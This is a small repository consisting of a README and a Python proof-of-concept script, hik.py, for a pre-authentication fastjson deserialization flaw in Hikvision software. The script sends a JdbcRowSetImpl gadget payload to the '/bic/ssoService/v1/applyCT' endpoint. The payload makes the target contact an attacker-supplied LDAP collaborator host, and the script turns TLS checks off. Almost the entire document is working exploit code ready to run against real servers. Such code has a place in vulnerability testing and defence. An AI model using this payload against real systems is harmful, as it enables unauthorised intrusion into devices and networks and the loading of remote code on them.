├── README.md
└── hik.py


/README.md:
--------------------------------------------------------------------------------
1 | # hikvision
2 | Hikvision pre-auth fastjson Poc
3 | 
4 | Usage: 
5 | ```python3 hik.py hikvisionURL collaboratorAddress:port```
6 | 
7 | ```e.g. python3 hik.py https://localhost:443 xxx.oastify.com:80```
8 | 


--------------------------------------------------------------------------------
/hik.py:
--------------------------------------------------------------------------------
 1 | # Hikvision fastjson PoC
 2 | # - Nicolas 21/12/2022
 3 | 
 4 | 
 5 | import urllib3
 6 | import requests,sys
 7 | requests.packages.urllib3.disable_warnings()
 8 | 
 9 | def hikvision(url,collabaddr):
10 |     url = url.strip()
11 |     url = url + '/bic/ssoService/v1/applyCT'
12 |     t_headers = {"Content-Type": "application/json;charset=UTF-8", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.37"}
13 |     c_data = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://'+ collabaddr+'","autoCommit":true}}'
14 |     try:
15 |         r = requests.post(url,headers=t_headers,data=c_data, timeout=50,verify=False)
16 |         print ("Connecting to:", url)
17 |         if (r.status_code == 404):
18 |             print ("Not vulnerable")
19 |         else:
20 |             print ("Check collaborator")
21 |     except requests.exceptions.RequestException as e:
22 |         raise SystemExit(e)
23 | 
24 | 
25 | if __name__ == '__main__':
26 |     try:
27 |         hikvision(sys.argv[1], sys.argv[2])
28 |     except:
29 |         print ("python hik.py targetURL collaborator")
30 | 


--------------------------------------------------------------------------------